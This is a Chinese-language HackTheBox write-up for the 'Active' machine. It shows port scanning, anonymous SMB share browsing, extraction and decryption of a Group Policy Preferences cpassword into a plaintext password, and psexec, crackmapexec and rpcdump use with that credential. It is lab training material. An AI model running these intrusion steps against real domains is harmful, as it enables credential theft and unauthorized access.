Active-htb-writeup

0x00 靶场技能介绍

章节技能:SMB匿名访问、Win2008组策略GPP漏洞、Kerberoasting攻击

参考链接:

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.100

2、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿offsec)-[~/Desktop]
└─$ nmap -p- --min-rate 10000 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 22:18 CST
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.31s latency).
Not shown: 39775 filtered tcp ports (no-response), 25748 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
49152/tcp open  unknown
49153/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49171/tcp open  unknown
                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -sU --min-rate 10000 10.10.10.100
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 22:30 CST
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.51s latency).
Not shown: 65473 open|filtered udp ports (no-response), 59 closed udp ports (port-unreach)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 77.96 seconds

3、使用smbcilent查看下445端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L \\10.10.10.100 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

4、使用 smbmap 查看下SMB服务中可以访问的目录情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.100                         

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.10.100:445        Name: 10.10.10.100              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

5、查看下可以访问的Replication目录是否存在啥敏感信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  active.htb                          D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 219817 blocks available
smb: \> cd active.htb
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 18:37:44 2018
  Policies                            D        0  Sat Jul 21 18:37:44 2018
  scripts                             D        0  Thu Jul 19 02:48:57 2018

                5217023 blocks of size 4096. 210953 blocks available
smb: \active.htb\> cd DfsrPrivate
smb: \active.htb\DfsrPrivate\> ls
  .                                 DHS        0  Sat Jul 21 18:37:44 2018
  ..                                DHS        0  Sat Jul 21 18:37:44 2018
  ConflictAndDeleted                  D        0  Thu Jul 19 02:51:30 2018
  Deleted                             D        0  Thu Jul 19 02:51:30 2018
  Installing                          D        0  Thu Jul 19 02:51:30 2018

                5217023 blocks of size 4096. 205087 blocks available
smb: \active.htb\DfsrPrivate\> cd ConflictAndDeleted
smb: \active.htb\DfsrPrivate\ConflictAndDeleted\> ls
  .                                   D        0  Thu Jul 19 02:51:30 2018
  ..                                  D        0  Thu Jul 19 02:51:30 2018

                5217023 blocks of size 4096. 196743 blocks available
smb: \active.htb\DfsrPrivate\ConflictAndDeleted\> cd ../
smb: \active.htb\DfsrPrivate\> cd Deleted
smb: \active.htb\DfsrPrivate\Deleted\> ls
  .                                   D        0  Thu Jul 19 02:51:30 2018
  ..                                  D        0  Thu Jul 19 02:51:30 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\DfsrPrivate\Deleted\> cd ../
smb: \active.htb\DfsrPrivate\> cd Installing
smb: \active.htb\DfsrPrivate\Installing\> ls
  .                                   D        0  Thu Jul 19 02:51:30 2018
  ..                                  D        0  Thu Jul 19 02:51:30 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\DfsrPrivate\Installing\> cd ../../
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 18:37:44 2018
  Policies                            D        0  Sat Jul 21 18:37:44 2018
  scripts                             D        0  Thu Jul 19 02:48:57 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\> cd Policies
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 18:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  GPT.INI                             A       23  Thu Jul 19 04:46:06 2018
  Group Policy                        D        0  Sat Jul 21 18:37:44 2018
  MACHINE                             D        0  Sat Jul 21 18:37:44 2018
  USER                                D        0  Thu Jul 19 02:49:12 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cat GPT.INI
cat: command not found
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> type GPT.INI
type: command not found
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> get GPT.INI
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd Group Policy
cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  GPT.INI                             A       23  Thu Jul 19 04:46:06 2018
  Group Policy                        D        0  Sat Jul 21 18:37:44 2018
  MACHINE                             D        0  Sat Jul 21 18:37:44 2018
  USER                                D        0  Thu Jul 19 02:49:12 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd Group Policy/
cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd MACHINE
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Microsoft                           D        0  Sat Jul 21 18:37:44 2018
  Preferences                         D        0  Sat Jul 21 18:37:44 2018
  Registry.pol                        A     2788  Thu Jul 19 02:53:45 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Microsoft
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Windows NT                          D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\> cd ../
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd Preferences
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Groups                              D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 04:46:06 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now
  
  
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.100\\Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Groups.xml                          A      533  Thu Jul 19 04:46:06 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> cd ../../
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Microsoft                           D        0  Sat Jul 21 18:37:44 2018
  Preferences                         D        0  Sat Jul 21 18:37:44 2018
  Registry.pol                        A     2788  Thu Jul 19 02:53:45 2018

                5217023 blocks of size 4096. 284083 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> get Registry.pol
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (1.6 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\> cd ../
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  GPT.INI                             A       23  Thu Jul 19 04:46:06 2018
  Group Policy                        D        0  Sat Jul 21 18:37:44 2018
  MACHINE                             D        0  Sat Jul 21 18:37:44 2018
  USER                                D        0  Thu Jul 19 02:49:12 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> cd USER
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> ls
  .                                   D        0  Thu Jul 19 02:49:12 2018
  ..                                  D        0  Thu Jul 19 02:49:12 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER\> cd ../../
smb: \active.htb\Policies\> 
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 18:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\> cd {6AC1786C-016F-11D2-945F-00C04fB984F9}
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  GPT.INI                             A       22  Thu Jul 19 02:49:12 2018
  MACHINE                             D        0  Sat Jul 21 18:37:44 2018
  USER                                D        0  Thu Jul 19 02:49:12 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> cd MACHINE
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Microsoft                           D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\> cd Microsoft
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  Windows NT                          D        0  Sat Jul 21 18:37:44 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> cd Windows NT
cd \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\> cd ../../
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\> cd USER
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER\> ls
  .                                   D        0  Thu Jul 19 02:49:12 2018
  ..                                  D        0  Thu Jul 19 02:49:12 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER\>
smb: \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER\> cd ../../../
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 18:37:44 2018
  ..                                  D        0  Sat Jul 21 18:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 18:37:44 2018
  Policies                            D        0  Sat Jul 21 18:37:44 2018
  scripts                             D        0  Thu Jul 19 02:48:57 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\> cd scripts
smb: \active.htb\scripts\> ls
  .                                   D        0  Thu Jul 19 02:48:57 2018
  ..                                  D        0  Thu Jul 19 02:48:57 2018

                5217023 blocks of size 4096. 284067 blocks available
smb: \active.htb\scripts\>

6、这里其实在 .xml 这个文件里发现了一些信息

1
2
3
4
5
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat Groups.xml 
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

7、主要是涉及账号和加密的密码

1
2
3
name="active.htb\SVC_TGS" 

cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

8、下面先绑定下本地域名信息

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.100 active.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.100 active.htb

9、如果有经验的,其实通过上面的那个 .xml 就可以知道这是一个 Win2008组策略GPP漏洞

10、解密的话,一个是使用上面的Python脚本,但是我没有运行成功,所以我使用了kali自带的解密工具, gpp-decrypt

1
2
3
┌──(kali㉿offsec)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

11、由于这个账号没有对共享目录的使用权限,导致无法使用psexec进行命令执行

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec SVC_TGS@10.10.10.100 
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.10.10.100.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

12、通过 crackmapexec 这个工具也查看到了这一点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --shares
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing FTP protocol database
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing RDP protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB         10.10.10.100    445    NONE             [*]  x64 (name:) (domain:) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    NONE             [+] \SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.10.10.100    445    NONE             [+] Enumerated shares
SMB         10.10.10.100    445    NONE             Share           Permissions     Remark
SMB         10.10.10.100    445    NONE             -----           -----------     ------
SMB         10.10.10.100    445    NONE             ADMIN$                          Remote Admin
SMB         10.10.10.100    445    NONE             C$                              Default share
SMB         10.10.10.100    445    NONE             IPC$                            Remote IPC
SMB         10.10.10.100    445    NONE             NETLOGON        READ            Logon server share 
SMB         10.10.10.100    445    NONE             Replication     READ            
SMB         10.10.10.100    445    NONE             SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    NONE             Users           READ

13、由于不断的学习吧,这里就又使用该账号查看了rpc的进程情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-rpcdump active.htb\SVC_TGS:GPPstillStandingStrong2k18@10.10.10.100
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Retrieving endpoint list from 10.10.10.100
Protocol: [MS-RSP]: Remote Shutdown Protocol 
Provider: wininit.exe 
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49152]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\DC[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc08B540]

Protocol: N/A 
Provider: winlogon.exe 
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0 
Bindings: 
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\DC[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc08B540]
          ncalrpc:[WMsgKRpc08B841]

Protocol: N/A 
Provider: sysntfy.dll 
UUID    : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings: 
          ncalrpc:[LRPC-b86370a004c1f5e7e0]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]
          ncalrpc:[IUserProfile2]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: dhcpcsvc6.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc6]
          ncalrpc:[dhcpcsvc]
          ncacn_ip_tcp:10.10.10.100[49153]
          ncacn_np:\\DC[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: N/A 
Provider: dhcpcsvc.dll 
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings: 
          ncalrpc:[dhcpcsvc]
          ncacn_ip_tcp:10.10.10.100[49153]
          ncacn_np:\\DC[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: N/A 
Provider: nrpsrv.dll 
UUID    : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49153]
          ncacn_np:\\DC[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol 
Provider: wevtsvc.dll 
UUID    : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49153]
          ncacn_np:\\DC[\pipe\eventlog]
          ncalrpc:[eventlog]

Protocol: N/A 
Provider: iphlpsvc.dll 
UUID    : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings: 
          ncacn_np:\\DC[\PIPE\srvsvc]
          ncacn_ip_tcp:10.10.10.100[49154]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: IKEEXT.DLL 
UUID    : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings: 
          ncacn_np:\\DC[\PIPE\srvsvc]
          ncacn_ip_tcp:10.10.10.100[49154]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: srvsvc.dll 
UUID    : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49154]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: schedsvc.dll 
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 
Bindings: 
          ncacn_ip_tcp:10.10.10.100[49154]
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol 
Provider: taskcomp.dll 
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 
Bindings: 
          ncacn_np:\\DC[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: schedsvc.dll 
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 
Bindings: 
          ncalrpc:[senssvc]
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: gpsvc.dll 
UUID    : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 
Bindings: 
          ncalrpc:[OLE219EF016B4DC452799D398A8ED36]
          ncalrpc:[IUserProfile2]

Protocol: N/A 
Provider: authui.dll 
UUID    : 24019106-A203-4642-B88D-82DAE9158929 v1.0 
Bindings: 
          ncalrpc:[LRPC-02d691a518757df2ee]

Protocol: N/A 
Provider: N/A 
UUID    : 3473DD4D-2E88-4006-9CBA-22570909DD10 v5.1 WinHttp Auto-Proxy Service
Bindings: 
          ncacn_np:\\DC[\PIPE\W32TIME_ALT]
          ncalrpc:[W32TIME_ALT]
          ncalrpc:[LRPC-ad268f2e1611d88c77]
          ncalrpc:[OLEC2F5065216764A74AD990E0A0C1C]

Protocol: N/A 
Provider: nsisvc.dll 
UUID    : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings: 
          ncalrpc:[LRPC-ad268f2e1611d88c77]
          ncalrpc:[OLEC2F5065216764A74AD990E0A0C1C]

Protocol: N/A 
Provider: MPSSVC.dll 
UUID    : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings: 
          ncalrpc:[LRPC-31485e4410b15e855e]

